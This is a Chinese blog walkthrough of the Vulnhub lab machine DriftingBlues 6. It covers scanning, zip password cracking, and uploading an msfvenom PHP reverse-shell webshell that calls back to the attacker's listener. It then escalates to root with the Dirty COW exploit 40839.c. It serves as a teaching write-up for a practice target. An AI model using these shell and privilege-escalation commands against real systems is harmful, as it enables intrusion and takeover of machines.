Vulnhub靶机driftingblues6_vh渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover
发现主机
![在这里插入图片描述](https://img-blog.csdnimg.cn/5fddb307aad04903a6a470aaf58b1665.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.12
使用命令:nmap -sS -sV -A -n 172.16.5.12
![在这里插入图片描述](https://img-blog.csdnimg.cn/686f5ea604494f7a86453b53281a18b1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
发现只有一个80端口 进行访问查看
![在这里插入图片描述](https://img-blog.csdnimg.cn/63349b39e83f4f89b92e1ad480bcb94c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
使用dirb 172.16.5.12
扫描网站的后台 发现了robots.txt
发现禁止爬取,然后根据提示访问 /textpattern/textpattern
发现了登入后台
![在这里插入图片描述](https://img-blog.csdnimg.cn/55d7799bc00b4a89b0fcbc3b3273991c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/cae66f03db384c089f4ddb5a1746a901.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/97d0547d4cd14f12bedf47dc4d27a2be.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
他还给了一个提示 :别忘了加上,zip扩展到你的dir brute
②:开始目录爆破:
使用命令:python3 dirsearch.py -u http://172.16.5.12/ -e php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
![在这里插入图片描述](https://img-blog.csdnimg.cn/47984c36dd714894b949fd3628d79a43.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/a9c7865844814e13b0981c69027393f1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
先把这个zip下载下来 然后在解压 但是发现需要密码
![在这里插入图片描述](https://img-blog.csdnimg.cn/567b6fe733fa4d409805c4c32bdd792f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
③:暴力破解zip:
可以使用fcrackzip
破解, 字典也是kali自带的, 也可以使用john
使用命令:zip2join spammer.zip > password.txt
john password.txt #执行
![在这里插入图片描述](https://img-blog.csdnimg.cn/b78ff2954b8e4af1b4eb0fc041ac2c3a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
得到密码是:myspace4
然后打开 zip 里面有个creds.txt 使用cat 查看一下 就是后台登入的账号和密码:mayer:lionheart
![在这里插入图片描述](https://img-blog.csdnimg.cn/53fa487af20c42e6a556d6e170be8d2f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
③:上传WebShell:
登入后台以后 需要找上传点 然后我们发现了一个Files
模块 可以进行上传。
![在这里插入图片描述](https://img-blog.csdnimg.cn/19eca835d61c4ba08dbca3904da2fa10.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
这里可以使用的方法很多,我们就使用最简单的使用msfveom
制作一个php
回弹shell
的木马 然后设置监听 运行木马即可。
msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.5.42 lport=886 -f raw > webshell.php
-p : 指定payload 为 php/meterpreter/reverse_tcp
;
-f :设置输出格式(raw)
![在这里插入图片描述](https://img-blog.csdnimg.cn/ca007aaba9494a4d8ce99b60f0f4d270.png)
使用模块:use exploit/multi/handler
设置payload :set payload php/meterpreter/reverse_tcp
设置 监听端口和ip:
![在这里插入图片描述](https://img-blog.csdnimg.cn/de1b90fbc8604c30976615e0b41aa08f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
④:脏牛提权:
进入后渗透模块 先看一下基本信息,因为是一个www-data账户,需要升级到root权限。查看靶机内核信息:sysinfo
发现内核版本是 脏牛提权。
![在这里插入图片描述](https://img-blog.csdnimg.cn/d0e710ee46794d2faa734a7145dbc10c.png)
执行searchsploit 40839
然后upload 上传 40839.c
文件 gcc
编译 然后 ./
运行
![在这里插入图片描述](https://img-blog.csdnimg.cn/16cbf4762f8747f48ad759aadc937ba7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/35e7b49d00b745a6a702aef16296452a.png)
靶机执行:gcc -pthread 40839.c -o 40839 -lcrypt
为了保险给777权限:chmod 777 40839
最后执行:./40839
会要求你输入一个新的密码:
![在这里插入图片描述](https://img-blog.csdnimg.cn/1fb233d973654908a878d1d719612f89.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
需要在shell 里面写一个python交互:
python -c 'import pty; pty.spawn("/bin/sh")'
然后切换用户 就是最高权限root了 查看flag
⑤:获取flag:
![在这里插入图片描述](https://img-blog.csdnimg.cn/b634fcd518d64d64a38ae2ff36b54938.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
Vulnhub靶机渗透总结:
因为是第一次做也做了挺久的,但是这个靶场也不难 只要细心一点就可以了,需要主要的一些细节就是 :
1.msfvenom 生成的php木马需要把注释去掉
2.提权是时候需要给777权限
3.要写python 交互 不然切换不了用户
最后 看了 别人写的文章都没怎么写php 回弹木马 这里具体写了一下 针对刚入门的小伙伴比较合适看,创作不易 希望对大家有所帮助!!